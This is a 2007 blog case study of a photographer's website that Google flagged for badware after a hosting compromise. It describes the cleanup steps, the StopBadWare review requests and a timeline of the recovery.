Badware
June 20th, 2007
I just had Rafi, an associate that is a Wedding Photographer in Toronto, contact me wanting some help with his site. Some hacker got into his hosting account and either installed malicious software on his site or added links on his site to malicious software.
I am making a case study out of this incident and will be adding information and resources as I work to get the Google flag and redirect lifted from Rafi’s site.
All the VideoBabylon.ca pages in the Google SERP now have “This Site May Harm Your Computer” right below the title and when you go to click through to the site you are taken to a Warning - visiting this web site may harm your computer! page. This means no traffic from Google until this flag gets lifted.
The following screen shot shows the warning which I have highlighted in yellow. Here is the results live on a search of Wedding Photographer Toronto.
When you click on the warning for any of the VideoBabylon.ca pages it takes you to a Concerns About Content in our Index page.
When a site gets flagged by Google for badware, Google also sends the data they have gathered to StopBadWare.org which in turn posts this information on their Badware Website Clearinghouse. Here is the Badware Website Clearinghouse record for videobabylon.ca.
In the Google Webmaster Guidelines there is a seperate page for the specific guideline of Don’t create pages that install viruses, trojans, or other badware which gives you Googles position on badware.
For those that are concerned that someone may wrongly or falsely report your site and cause Google to place a warning in the search engine results StopBadWare has posted the following information on their FAQ page.
Google independently identifies sites that host or distribute badware. If it finds a site that contains or links to badware, it puts up a warning page in the search results for that site (discussed in the FAQ above). Google also informs StopBadware, after the fact, of its findings. If a search for your site leads to a Google warning page, it means that Google’s testing process has found your site to be hosting or distributing badware, and thus potentially harmful. Google does not post warning pages merely in response to reports from the public but only after, and as a result of, its own testing of the site.
Steps to Getting this Flag Removed
1. Get the Badware off Your Site
Read through the StopBadWare Tips for Cleaning and Securing Your Website and read the their FAQ about Google Warnings.
Completing the following can significantly shorten the time for StopBadWare to process your review.
Remove all badware and links to badware from your website, and fix any security vulnerabilities that are present on your site… In addition, fixing security vulnerabilities will help prevent badware from being injected onto your site in the future, and thus reduce the probability that your site will be submitted to the Badware Website Clearinghouse again.
VideoBabylon.ca is on a shared hosting account so all files were restored to an older version and all passwords were changed.
2. Request a Site Review
The 2nd step is to do a request for review. On this page you add your site into the field that is in front of the “Search Clearinghouse” button and click the button. This will do a search for your domain.
If you have a warning page from Google your site should come up. Click on link to the site after you search and fill out the Review Request. If you site doesn’t come up you can request a review of your site on the Review Request for Website not in Clearinghouse page.
StopBadWare will forward your request information to Google.
Here is the request for videobabylon.ca.
3. Verify That you Have Requested a Review.
After you have done a request for review you want to double check to make sure StopBadWare.org shows that you have in fact done this. Go to the Search Badware Website Clearinghouse page and search for your domain. You domain should show in the results of the search and will have either a Red A in a circle 
or a Black A in a circle 
to the left of the domain.
A shows that you have made a review request and the shows you having not made a request for review.
Here is the status of the request from videobabylon.ca.
4. Monitor the Status of Your Request for Review
After you have verified that you have requested a review you want to monitor that request and wait for the decision that StopBadWare gives.
I am currently monitoring videobabylon.ca.
According to Danny Sullivan the process is still an up to 2 week processing time.
Time Line:
Jun 20 1400hr: Rafi viewed site SERP and there was no flag.
Jun 20 1200hr: Rafi is informated they have been flagged.
Jun 21 1200hr: Rafi replaces all files with backup and changes all passwords.
Jun 21 1200hr: Rafi made a request for review to stopbadware.
Jun 21 1300hr: Rafi contacted SEO Company.
Jun 21 1400hr: SEO Company goes over site. Submits request to stopbadware to review URL www.videobabylon.ca/ which is the URL Google flagged. (The client made request for review for URL www.videobabylon.ca but Google flagged www.videobabylon.ca/ which stopbadware showed as different).
Jun 25 1900hr: stopbadware shows a review request has been made for www.videobabylon.ca/.
Jul 05 1835hr: stopbadware sends client an email noting the site has obfuscated code that injects an iframe with a link to an infected site. Requests code removable and to do another request for review.
Related Links:
Matt Cutts Blog — How Google handles malware: a historical overview
Matt Cutts Blog — Info about malware warnings and how to appeal them
Matt Cutts Blog — Got malware? Google will help you find it
Google Group — stopbadware
Google Webmaster Central Blog — Better badware notifications for webmasters
Niels Provos & other Googlers — The Ghost In The Browser Analysis of Web-based Malware
Notes:
The Virus Graphics is from Geeks.com tech-tips and is licensed under the Creative Commons Attribution-NonCommercial-NoDerivs 2.5 License.